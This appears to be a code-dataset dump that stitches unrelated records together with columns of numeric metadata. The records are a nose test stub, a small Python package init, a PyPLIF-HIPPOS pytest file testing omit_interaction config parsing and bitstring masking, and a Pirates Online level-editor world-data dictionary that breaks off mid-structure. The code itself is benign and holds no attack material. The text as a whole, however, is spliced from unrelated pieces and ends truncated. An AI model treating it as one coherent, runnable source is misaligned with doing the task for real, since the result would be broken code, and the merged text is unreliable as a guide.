    import nose
    nose.runmodule()
| 43.433447
| 110
| 0.663576
| 3,839
| 38,178
| 6.51628
| 0.063558
| 0.083147
| 0.052526
| 0.070155
| 0.9368
| 0.934482
| 0.932083
| 0.909338
| 0.901183
| 0.892669
| 0
| 0.049894
| 0.237205
| 38,178
| 878
| 111
| 43.482916
| 0.809113
| 0.031772
| 0
| 0.835866
| 0
| 0
| 0.020014
| 0.009365
| 0
| 0
| 0
| 0
| 0.206687
| 1
| 0.021277
| false
| 0
| 0.019757
| 0
| 0.044073
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b6b61045a3c1d433d3c3b8cf9566b675ebe2a99c
| 67
|
py
|
Python
|
speedy/src/java8speedy/__init__.py
|
ashrafizahra81/CodART
|
693e59d568b548edb2539d04cff1fd991de43124
|
[
"MIT"
] | 1
|
2022-02-04T11:09:08.000Z
|
2022-02-04T11:09:08.000Z
|
speedy/src/java8speedy/__init__.py
|
ashrafizahra81/CodART
|
693e59d568b548edb2539d04cff1fd991de43124
|
[
"MIT"
] | null | null | null |
speedy/src/java8speedy/__init__.py
|
ashrafizahra81/CodART
|
693e59d568b548edb2539d04cff1fd991de43124
|
[
"MIT"
] | null | null | null |
from .print_tree import print_tree
from .benchmark import benchmark
| 33.5
| 34
| 0.865672
| 10
| 67
| 5.6
| 0.5
| 0.321429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.104478
| 67
| 2
| 35
| 33.5
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.5
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
1e8a2fa776f5bd96393450257a891c27824bdb82
| 14,904
|
py
|
Python
|
tests/test_interactions/test_omit_interactions.py
|
radifar/PyPLIF-HIPPOS
|
95fc5dd81b900e84ae6f3368c4b70a08d17257dd
|
[
"HPND"
] | 13
|
2020-07-29T12:19:56.000Z
|
2022-02-07T04:48:19.000Z
|
tests/test_interactions/test_omit_interactions.py
|
radifar/PyPLIF-HIPPOS
|
95fc5dd81b900e84ae6f3368c4b70a08d17257dd
|
[
"HPND"
] | 5
|
2021-03-30T01:11:49.000Z
|
2021-09-13T11:49:35.000Z
|
tests/test_interactions/test_omit_interactions.py
|
radifar/PyPLIF-HIPPOS
|
95fc5dd81b900e84ae6f3368c4b70a08d17257dd
|
[
"HPND"
] | 5
|
2020-08-06T07:26:06.000Z
|
2021-10-30T17:16:39.000Z
|
"""
The tests for omit interaction feature
"""
import os
import sys
from collections import namedtuple
from pyplif_hippos import ParseConfig, hippos, similarity
def test_configuration_single_omit_interaction(tmpdir):
    """Parse a config with one omit_interaction line for a single residue.

    Writes a minimal HIPPOS configuration containing a single
    'omit_interaction hydrophobic ARG223' directive, points sys.argv at it,
    and checks that ParseConfig records the interaction type and residue.
    """
    # Arrange: write the configuration into a temporary directory.
    work_dir = tmpdir.mkdir("sub")
    config_file = work_dir.join("config.txt")
    config_file.write(
        """
docking_method plants # plants or vina
docking_conf plants-003.conf
similarity_coef tanimoto mcconnaughey
full_ref 00000100000000000000000000000000000100000000000001000000000000010000001000000000000000000001000000000000000000000000000000101000000000000000000101000000000010000 00010101000000000000000000000000000100000000000001010000000000010000001000000000000010000000000000000000000001011000001000001000000000000000000101000000000000000 00010101000000100000000000000000000100000000000001010100100000010000001000000000000010000001000000000000010000000000100000101010000000000000000001000000000000000
residue_name ARG116 GLU117 LEU132 LYS148 ASP149 ARG150 ARG154 TRP177 SER178 ILE221 ARG223 THR224 GLU226 ALA245 HIS273 GLU275 GLU276 ARG292 ASP294 GLY347 ARG374 TRP408 TYR409
residue_number 40 41 56 72 73 74 78 101 102 145 147 148 150 169 197 199 200 216 218 271 298 332 333
omit_interaction hydrophobic ARG223
full_outfile plants_full_ifp.csv
sim_outfile plants_similarity.csv
logfile plants.log
"""
    )
    config_path = os.path.join(config_file.dirname, config_file.basename)
    # Expose the config path through the CLI slot ParseConfig reads:
    # replaces argv[1] when present, appends otherwise.
    sys.argv[1:2] = [config_path]

    # Act
    parsed_config = ParseConfig()
    parsed_config.parse_config()
    omitted = parsed_config.omit_interaction[0]

    # Assert
    assert omitted.interaction_type == "hydrophobic"
    assert omitted.res_name == ["ARG223"]
def test_configuration_omit_multiple_residue_interaction(tmpdir):
    """Parse a config whose omit_interaction line lists several residues.

    A single 'omit_interaction hydrophobic ARG150 TRP177 ARG223' directive
    must yield one entry whose res_name holds all three residues in order.
    """
    # Arrange: write the configuration into a temporary directory.
    work_dir = tmpdir.mkdir("sub")
    config_file = work_dir.join("config.txt")
    config_file.write(
        """
docking_method plants # plants or vina
docking_conf plants-003.conf
similarity_coef tanimoto mcconnaughey
full_ref 00000100000000000000000000000000000100000000000001000000000000010000001000000000000000000001000000000000000000000000000000101000000000000000000101000000000010000 00010101000000000000000000000000000100000000000001010000000000010000001000000000000010000000000000000000000001011000001000001000000000000000000101000000000000000 00010101000000100000000000000000000100000000000001010100100000010000001000000000000010000001000000000000010000000000100000101010000000000000000001000000000000000
residue_name ARG116 GLU117 LEU132 LYS148 ASP149 ARG150 ARG154 TRP177 SER178 ILE221 ARG223 THR224 GLU226 ALA245 HIS273 GLU275 GLU276 ARG292 ASP294 GLY347 ARG374 TRP408 TYR409
residue_number 40 41 56 72 73 74 78 101 102 145 147 148 150 169 197 199 200 216 218 271 298 332 333
omit_interaction hydrophobic ARG150 TRP177 ARG223
full_outfile plants_full_ifp.csv
sim_outfile plants_similarity.csv
logfile plants.log
"""
    )
    config_path = os.path.join(config_file.dirname, config_file.basename)
    # Expose the config path through the CLI slot ParseConfig reads:
    # replaces argv[1] when present, appends otherwise.
    sys.argv[1:2] = [config_path]

    # Act
    parsed_config = ParseConfig()
    parsed_config.parse_config()
    omitted = parsed_config.omit_interaction[0]

    # Assert
    assert omitted.interaction_type == "hydrophobic"
    assert omitted.res_name == ["ARG150", "TRP177", "ARG223"]
def test_configuration_omit_multiple_interaction_type(tmpdir):
    """Parse a config with two omit_interaction lines of different types.

    Two directives (hydrophobic/ARG223 and h_bond/ARG292) must produce two
    separate entries in ParseConfig.omit_interaction, in file order.
    """
    # Arrange: write the configuration into a temporary directory.
    work_dir = tmpdir.mkdir("sub")
    config_file = work_dir.join("config.txt")
    config_file.write(
        """
docking_method plants # plants or vina
docking_conf plants-003.conf
similarity_coef tanimoto mcconnaughey
full_ref 00000100000000000000000000000000000100000000000001000000000000010000001000000000000000000001000000000000000000000000000000101000000000000000000101000000000010000 00010101000000000000000000000000000100000000000001010000000000010000001000000000000010000000000000000000000001011000001000001000000000000000000101000000000000000 00010101000000100000000000000000000100000000000001010100100000010000001000000000000010000001000000000000010000000000100000101010000000000000000001000000000000000
residue_name ARG116 GLU117 LEU132 LYS148 ASP149 ARG150 ARG154 TRP177 SER178 ILE221 ARG223 THR224 GLU226 ALA245 HIS273 GLU275 GLU276 ARG292 ASP294 GLY347 ARG374 TRP408 TYR409
residue_number 40 41 56 72 73 74 78 101 102 145 147 148 150 169 197 199 200 216 218 271 298 332 333
omit_interaction hydrophobic ARG223
omit_interaction h_bond ARG292
full_outfile plants_full_ifp.csv
sim_outfile plants_similarity.csv
logfile plants.log
"""
    )
    config_path = os.path.join(config_file.dirname, config_file.basename)
    # Expose the config path through the CLI slot ParseConfig reads:
    # replaces argv[1] when present, appends otherwise.
    sys.argv[1:2] = [config_path]

    # Act
    parsed_config = ParseConfig()
    parsed_config.parse_config()
    first_omitted = parsed_config.omit_interaction[0]
    second_omitted = parsed_config.omit_interaction[1]

    # Assert
    assert first_omitted.interaction_type == "hydrophobic"
    assert first_omitted.res_name == ["ARG223"]
    assert second_omitted.interaction_type == "h_bond"
    assert second_omitted.res_name == ["ARG292"]
def test_configuration_long_interaction_type(tmpdir):
    """Parse a config exercising every long-form interaction type keyword.

    One omit_interaction directive per long keyword (hydrophobic through
    aromatic_edgetoface); each must be stored with its type and residue.
    """
    # Arrange: write the configuration into a temporary directory.
    work_dir = tmpdir.mkdir("sub")
    config_file = work_dir.join("config.txt")
    config_file.write(
        """
docking_method plants # plants or vina
docking_conf plants-003.conf
similarity_coef tanimoto mcconnaughey
full_ref 00000100000000000000000000000000000100000000000001000000000000010000001000000000000000000001000000000000000000000000000000101000000000000000000101000000000010000 00010101000000000000000000000000000100000000000001010000000000010000001000000000000010000000000000000000000001011000001000001000000000000000000101000000000000000 00010101000000100000000000000000000100000000000001010100100000010000001000000000000010000001000000000000010000000000100000101010000000000000000001000000000000000
residue_name ARG116 GLU117 LEU132 LYS148 ASP149 ARG150 ARG154 TRP177 SER178 ILE221 ARG223 THR224 GLU226 ALA245 HIS273 GLU275 GLU276 ARG292 ASP294 GLY347 ARG374 TRP408 TYR409
residue_number 40 41 56 72 73 74 78 101 102 145 147 148 150 169 197 199 200 216 218 271 298 332 333
omit_interaction hydrophobic ARG116
omit_interaction aromatic GLU117
omit_interaction h_bond LEU132
omit_interaction electrostatic LYS148
omit_interaction h_bond_donor ASP149
omit_interaction h_bond_acceptor ARG150
omit_interaction electrostatic_positive ARG154
omit_interaction electrostatic_negative TRP177
omit_interaction aromatic_facetoface SER178
omit_interaction aromatic_edgetoface ILE221
full_outfile plants_full_ifp.csv
sim_outfile plants_similarity.csv
logfile plants.log
"""
    )
    config_path = os.path.join(config_file.dirname, config_file.basename)
    # Expose the config path through the CLI slot ParseConfig reads:
    # replaces argv[1] when present, appends otherwise.
    sys.argv[1:2] = [config_path]

    # Act
    parsed_config = ParseConfig()
    parsed_config.parse_config()

    # Assert: entries appear in file order, one per directive.
    expected = [
        ("hydrophobic", "ARG116"),
        ("aromatic", "GLU117"),
        ("h_bond", "LEU132"),
        ("electrostatic", "LYS148"),
        ("h_bond_donor", "ASP149"),
        ("h_bond_acceptor", "ARG150"),
        ("electrostatic_positive", "ARG154"),
        ("electrostatic_negative", "TRP177"),
        ("aromatic_facetoface", "SER178"),
        ("aromatic_edgetoface", "ILE221"),
    ]
    for index, (interaction_type, residue) in enumerate(expected):
        omitted = parsed_config.omit_interaction[index]
        assert omitted.interaction_type == interaction_type
        assert omitted.res_name == [residue]
def test_configuration_short_interaction_type(tmpdir):
    """Parse a config exercising every short-form interaction type keyword.

    Short keywords (HPB, ARM, HBD, ELE, HBD_DON, HBD_ACC, ELE_POS, ELE_NEG,
    ARM_F2F, ARM_E2F) must be normalized to their long-form names.
    """
    # Arrange: write the configuration into a temporary directory.
    work_dir = tmpdir.mkdir("sub")
    config_file = work_dir.join("config.txt")
    config_file.write(
        """
docking_method plants # plants or vina
docking_conf plants-003.conf
similarity_coef tanimoto mcconnaughey
full_ref 00000100000000000000000000000000000100000000000001000000000000010000001000000000000000000001000000000000000000000000000000101000000000000000000101000000000010000 00010101000000000000000000000000000100000000000001010000000000010000001000000000000010000000000000000000000001011000001000001000000000000000000101000000000000000 00010101000000100000000000000000000100000000000001010100100000010000001000000000000010000001000000000000010000000000100000101010000000000000000001000000000000000
residue_name ARG116 GLU117 LEU132 LYS148 ASP149 ARG150 ARG154 TRP177 SER178 ILE221 ARG223 THR224 GLU226 ALA245 HIS273 GLU275 GLU276 ARG292 ASP294 GLY347 ARG374 TRP408 TYR409
residue_number 40 41 56 72 73 74 78 101 102 145 147 148 150 169 197 199 200 216 218 271 298 332 333
omit_interaction HPB ARG116
omit_interaction ARM GLU117
omit_interaction HBD LEU132
omit_interaction ELE LYS148
omit_interaction HBD_DON ASP149
omit_interaction HBD_ACC ARG150
omit_interaction ELE_POS ARG154
omit_interaction ELE_NEG TRP177
omit_interaction ARM_F2F SER178
omit_interaction ARM_E2F ILE221
full_outfile plants_full_ifp.csv
sim_outfile plants_similarity.csv
logfile plants.log
"""
    )
    config_path = os.path.join(config_file.dirname, config_file.basename)
    # Expose the config path through the CLI slot ParseConfig reads:
    # replaces argv[1] when present, appends otherwise.
    sys.argv[1:2] = [config_path]

    # Act
    parsed_config = ParseConfig()
    parsed_config.parse_config()

    # Assert: short keywords map onto long-form type names, in file order.
    expected = [
        ("hydrophobic", "ARG116"),
        ("aromatic", "GLU117"),
        ("h_bond", "LEU132"),
        ("electrostatic", "LYS148"),
        ("h_bond_donor", "ASP149"),
        ("h_bond_acceptor", "ARG150"),
        ("electrostatic_positive", "ARG154"),
        ("electrostatic_negative", "TRP177"),
        ("aromatic_facetoface", "SER178"),
        ("aromatic_edgetoface", "ILE221"),
    ]
    for index, (interaction_type, residue) in enumerate(expected):
        omitted = parsed_config.omit_interaction[index]
        assert omitted.interaction_type == interaction_type
        assert omitted.res_name == [residue]
def test_replace_bit_char():
    """Check that replace_bit_char masks omitted positions with 'n'.

    Each mask flags the bit positions owned by one interaction type; those
    characters of the bitstring must become 'n' while all other positions
    are left untouched.
    """
    # Arrange: one (mask, expected result) pair per interaction type.
    original_bits = "1000001"
    cases = [
        ([1, 0, 0, 0, 0, 0, 0], "n000001"),  # hydrophobic
        ([0, 1, 1, 0, 0, 0, 0], "1nn0001"),  # aromatic
        ([0, 0, 0, 1, 1, 0, 0], "100nn01"),  # h_bond
        ([0, 0, 0, 0, 0, 1, 1], "10000nn"),  # electrostatic
        ([0, 0, 0, 1, 0, 0, 0], "100n001"),  # h_bond_donor
        ([0, 0, 0, 0, 1, 0, 0], "1000n01"),  # h_bond_acceptor
        ([0, 0, 0, 0, 0, 1, 0], "10000n1"),  # electrostatic_positive
        ([0, 0, 0, 0, 0, 0, 1], "100000n"),  # electrostatic_negative
        ([0, 1, 0, 0, 0, 0, 0], "1n00001"),  # aromatic_facetoface
        ([0, 0, 1, 0, 0, 0, 0], "10n0001"),  # aromatic_edgetoface
    ]

    # Act & Assert
    for omit_mask, expected in cases:
        assert hippos.replace_bit_char(original_bits, omit_mask) == expected
def test_cleanup_omitted_interaction():
    """Check bitstring cleanup performed before similarity calculation.

    Positions marked 'n' in the target bitstring must be removed from both
    the reference and the target so their lengths stay aligned.
    """
    # Arrange
    reference_bits = "000001000101"
    target_bits = "11n00n000011"

    # Act
    cleaned_reference, cleaned_target = similarity.clean_omitted_interactions(
        reference_bits, target_bits
    )

    # Assert: the two 'n' columns (indices 2 and 5) are gone from both.
    assert cleaned_reference == "0000000101"
    assert cleaned_target == "1100000011"
| 39.638298
| 495
| 0.790526
| 1,687
| 14,904
| 6.688797
| 0.108477
| 0.162177
| 0.08933
| 0.057426
| 0.850053
| 0.844647
| 0.814073
| 0.775611
| 0.765509
| 0.765509
| 0
| 0.278371
| 0.145062
| 14,904
| 375
| 496
| 39.744
| 0.607205
| 0.037976
| 0
| 0.662722
| 0
| 0
| 0.080014
| 0.010431
| 0
| 0
| 0
| 0
| 0.35503
| 1
| 0.04142
| false
| 0
| 0.023669
| 0
| 0.065089
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
94e5241d69b771f3a6a6262db895824ca5e53381
| 136,125
|
py
|
Python
|
pirates/leveleditor/worldData/CatacombsTEST.py
|
Willy5s/Pirates-Online-Rewritten
|
7434cf98d9b7c837d57c181e5dabd02ddf98acb7
|
[
"BSD-3-Clause"
] | 81
|
2018-04-08T18:14:24.000Z
|
2022-01-11T07:22:15.000Z
|
pirates/leveleditor/worldData/CatacombsTEST.py
|
Willy5s/Pirates-Online-Rewritten
|
7434cf98d9b7c837d57c181e5dabd02ddf98acb7
|
[
"BSD-3-Clause"
] | 4
|
2018-09-13T20:41:22.000Z
|
2022-01-08T06:57:00.000Z
|
pirates/leveleditor/worldData/CatacombsTEST.py
|
Willy5s/Pirates-Online-Rewritten
|
7434cf98d9b7c837d57c181e5dabd02ddf98acb7
|
[
"BSD-3-Clause"
] | 26
|
2018-05-26T12:49:27.000Z
|
2021-09-11T09:11:59.000Z
|
from pandac.PandaModules import Point3, VBase3, Vec4
objectStruct = {'Adj Table': {'1235611035.98akelts': ['1235611061.09akelts', '1235611117.05akelts', '1235611119.02akelts', '1235611119.33akelts'],'1235611061.09akelts': ['1235611035.98akelts', '1235611121.0akelts'],'1235611115.91akelts': ['1235611121.0akelts', '1235611116.59akelts'],'1235611116.59akelts': ['1235611115.91akelts'],'1235611117.05akelts': ['1235611035.98akelts', '1235611117.31akelts'],'1235611117.31akelts': ['1235611117.05akelts', '1235611117.69akelts'],'1235611117.69akelts': ['1235611117.31akelts', '1236293632.0akelts'],'1235611119.02akelts': ['1235611035.98akelts', '1235611795.97akelts', '1235611792.13akelts'],'1235611119.33akelts': ['1235611035.98akelts', '1235611119.91akelts', '1235611519.63akelts'],'1235611119.91akelts': ['1235611119.33akelts', '1235611120.45akelts'],'1235611120.45akelts': ['1235611119.91akelts', '1235611361.5akelts'],'1235611121.0akelts': ['1235611061.09akelts', '1235611115.91akelts'],'1235611344.81akelts': ['1235611352.94akelts', '1235611353.63akelts'],'1235611347.08akelts': ['1235611361.5akelts', '1235611348.2akelts'],'1235611348.2akelts': ['1235611347.08akelts', '1235611348.83akelts'],'1235611348.83akelts': ['1235611348.2akelts'],'1235611352.23akelts': ['1235611353.63akelts'],'1235611352.94akelts': ['1235611361.5akelts', '1235611344.81akelts', '1235611534.09akelts'],'1235611353.63akelts': ['1235611344.81akelts', '1235611352.23akelts'],'1235611361.5akelts': ['1235611352.94akelts', '1235611347.08akelts', '1235611120.45akelts'],'1235611519.63akelts': ['1235611119.33akelts', '1235611530.08akelts'],'1235611528.14akelts': ['1235611528.78akelts', '1235611534.09akelts'],'1235611528.78akelts': ['1235611529.42akelts', '1235611528.14akelts'],'1235611529.42akelts': ['1235611528.78akelts', '1235611746.08akelts'],'1235611530.08akelts': ['1235611519.63akelts', '1235611530.73akelts'],'1235611530.73akelts': ['1235611531.39akelts', '1235611530.08akelts'],'1235611531.39akelts': ['1235611532.06akelts', 
'1235611530.73akelts'],'1235611532.06akelts': ['1235611531.39akelts', '1235611532.73akelts', '1235611533.41akelts'],'1235611532.73akelts': ['1235611532.06akelts'],'1235611533.41akelts': ['1235611532.06akelts', '1235611746.08akelts'],'1235611534.09akelts': ['1235611352.94akelts', '1235611528.14akelts'],'1235611746.08akelts': ['1235611529.42akelts', '1235611533.41akelts'],'1235611775.94akelts': ['1235611795.97akelts', '1235611787.47akelts'],'1235611777.48akelts': ['1235611787.47akelts', '1235611781.22akelts', '1235611784.77akelts'],'1235611781.22akelts': ['1235611777.48akelts'],'1235611782.08akelts': ['1235611787.47akelts', '1235611783.0akelts'],'1235611783.0akelts': ['1235611783.89akelts', '1235611786.56akelts', '1235611782.08akelts'],'1235611783.89akelts': ['1235611783.0akelts', '1235611785.67akelts'],'1235611784.77akelts': ['1235611777.48akelts', '1235611795.0akelts'],'1235611785.67akelts': ['1235611783.89akelts'],'1235611786.56akelts': ['1235611783.0akelts', '1235611788.39akelts'],'1235611787.47akelts': ['1235611777.48akelts', '1235611782.08akelts', '1235611775.94akelts'],'1235611788.39akelts': ['1235611786.56akelts', '1235611793.08akelts', '1235611789.31akelts'],'1235611789.31akelts': ['1235611788.39akelts', '1235611790.25akelts'],'1235611790.25akelts': ['1235611791.19akelts', '1235611789.31akelts'],'1235611791.19akelts': ['1235611790.25akelts', '1235611792.13akelts'],'1235611792.13akelts': ['1235611791.19akelts', '1235611119.02akelts'],'1235611793.08akelts': ['1235611788.39akelts', '1235611794.03akelts'],'1235611794.03akelts': ['1235611793.08akelts'],'1235611795.0akelts': ['1235611784.77akelts'],'1235611795.97akelts': ['1235611119.02akelts', '1235611775.94akelts'],'1236293632.0akelts': ['1235611117.69akelts', '1236293632.0akelts2'],'1236293632.0akelts2': ['1236293632.0akelts']},'AmbientColors': {0: Vec4(0.447059, 0.529412, 0.647059, 1),2: Vec4(0.537255, 0.494118, 0.627451, 1),4: Vec4(0.4, 0.447059, 0.494118, 1),6: Vec4(0.439216, 0.447059, 0.556863, 1),8: 
Vec4(0.388235, 0.419608, 0.537255, 1),12: Vec4(0.34, 0.28, 0.41, 1),13: Vec4(0.34, 0.28, 0.41, 1),16: Vec4(0.768627, 0, 0, 1)},'DirectionalColors': {0: Vec4(0.54902, 0.458824, 0.34902, 1),2: Vec4(0.458824, 0.458824, 0.364706, 1),4: Vec4(0.6, 0.337255, 0.0941176, 1),6: Vec4(0.458824, 0.478431, 0.447059, 1),8: Vec4(0.419608, 0.419608, 0.4, 1),12: Vec4(0.66, 0.76, 0.05, 1),13: Vec4(0.66, 0.76, 0.05, 1),16: Vec4(0, 0, 0, 1)},'FogColors': {-1: Vec4(0.0941176, 0.152941, 0.152941, 1),0: Vec4(0.294118, 0.2, 0.14902, 1),2: Vec4(0.6, 0.694118, 0.894118, 1),4: Vec4(0.294118, 0.176471, 0.14902, 1),6: Vec4(0.14902, 0.2, 0.34902, 1),8: Vec4(0.0470588, 0.0588235, 0.168627, 1),12: Vec4(0.1, 0.12, 0.03, 0),13: Vec4(0.1, 0.12, 0.03, 0),16: Vec4(0, 0, 1, 1)},'FogRanges': {-1: 0.0015,0: 9.999999747378752e-05,2: 9.999999747378752e-05,4: 9.999999747378752e-05,6: 9.999999747378752e-05,8: 0.00019999999494757503,12: 0.00025,13: 0.00025,16: 0.0015999999595806003},'Objects': {'1235605888.0akelts': {'Type': 'Island Game Area','Name': 'default','File': '','Instanced': False,'Minimap': False,'Objects': {'1235611035.98akelts': {'Type': 'Cave_Pieces','Hpr': Point3(0.0, 0.0, 0.0),'Objects': {'1235611036.02akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(0.0, 0.0, 0.0),'Parent Uid': '1235611035.98akelts','Pos': Point3(100.0, -100.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611036.03akelts': {'Type': 'Locator Node','Name': 'cave_connector_2','Hpr': VBase3(-90.0, 0.0, 0.0),'Parent Uid': '1235611035.98akelts','Pos': Point3(0.0, -200.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611036.05akelts': {'Type': 'Locator Node','Name': 'cave_connector_3','Hpr': VBase3(-180.0, 0.0, 0.0),'Parent Uid': '1235611035.98akelts','Pos': Point3(-100.0, -100.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611036.0akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611035.98akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 
1.0)},'1237574022.48akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-71.193, 0.0, 0.0),'Pos': Point3(-59.816, -138.874, -9.726),'Scale': VBase3(1.393, 1.393, 1.393),'VisSize': 'Large','VisZone': '1_1235611035.98akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rockGroup_d'}},'1237574300.08akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(50.108, 0.0, 0.0),'Pos': Point3(28.956, -31.051, -5.687),'Scale': VBase3(1.102, 1.102, 1.102),'VisSize': 'Large','VisZone': '0_1235611035.98akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rockGroup_c'}},'1237590784.0akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-37.172, 0.0, 0.0),'Pos': Point3(-38.285, -165.456, -4.611),'Scale': VBase3(1.393, 1.393, 1.393),'VisSize': 'Large','VisZone': '2_1235611035.98akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rockGroup_e'}}},'Pos': Point3(0.0, 0.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611119.33akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_fourway200'}},'1235611061.09akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(270.0, 0.0, 0.0),'Objects': {'1235611061.11akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611061.09akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611061.13akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-90.0, 0.0, 0.0),'Parent Uid': '1235611061.09akelts','Pos': Point3(0.0, -100.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-100.0, -100.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '1_1235611035.98akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_hallTransition'}},'1235611115.91akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(540.0, 0.0, 0.0),'Objects': {'1235611115.92akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 
0.0),'Parent Uid': '1235611115.91akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611147.86akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-180.0, 0.0, 0.0),'Parent Uid': '1235611115.91akelts','Pos': Point3(-175.0, -175.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-525.0, -275.0, 158.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611115.91akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_curveNarrow'}},'1235611116.59akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(0.0, 0.0, 0.0),'Objects': {'1235611116.61akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611116.59akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237573872.64akelts': {'Type': 'Tunnel Cap','DisableCollision': False,'Holiday': '','Hpr': VBase3(-180.0, 0.0, 0.0),'Objects': {'1237573913.83akelts': {'Type': 'Locator Node','Name': 'portal_interior_1','Hpr': Point3(0.0, 0.0, 0.0),'Parent Uid': '1237573872.64akelts','Pos': Point3(0.0, -0.088, 0.254),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-0.231, -70.214, 3.791),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611116.59akelts','Visual': {'Model': 'models/tunnels/pir_m_are_tun_caveInterior_cap'}}},'Pos': Point3(-525.0, -275.0, 158.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611115.91akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_deadend100_entrance'}},'1235611117.05akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(90.0, 0.0, 0.0),'Objects': {'1235611117.06akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611117.05akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611170.42akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-90.0, 0.0, 0.0),'Parent Uid': '1235611117.05akelts','Pos': Point3(0.0, -100.0, 0.0),'Scale': VBase3(1.0, 1.0, 
1.0)}},'Pos': Point3(100.0, -100.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611035.98akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_hallTransition'}},'1235611117.31akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(90.0, 0.0, 0.0),'Objects': {'1235611117.33akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611117.31akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611198.48akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-90.0, 0.0, 0.0),'Parent Uid': '1235611117.31akelts','Pos': Point3(0.0, -150.0, 41.991),'Scale': VBase3(1.0, 1.0, 1.0)},'1237594368.0akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-126.499, 0.0, 0.0),'Pos': Point3(22.615, -74.782, 12.516),'Scale': VBase3(1.245, 1.245, 1.351),'VisSize': 'Large','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_c'}}},'Pos': Point3(200.0, -100.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611117.05akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_hallNarrowAscend'}},'1235611117.69akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(0.0, 0.0, 0.0),'Objects': {'1235611117.7akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611117.69akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 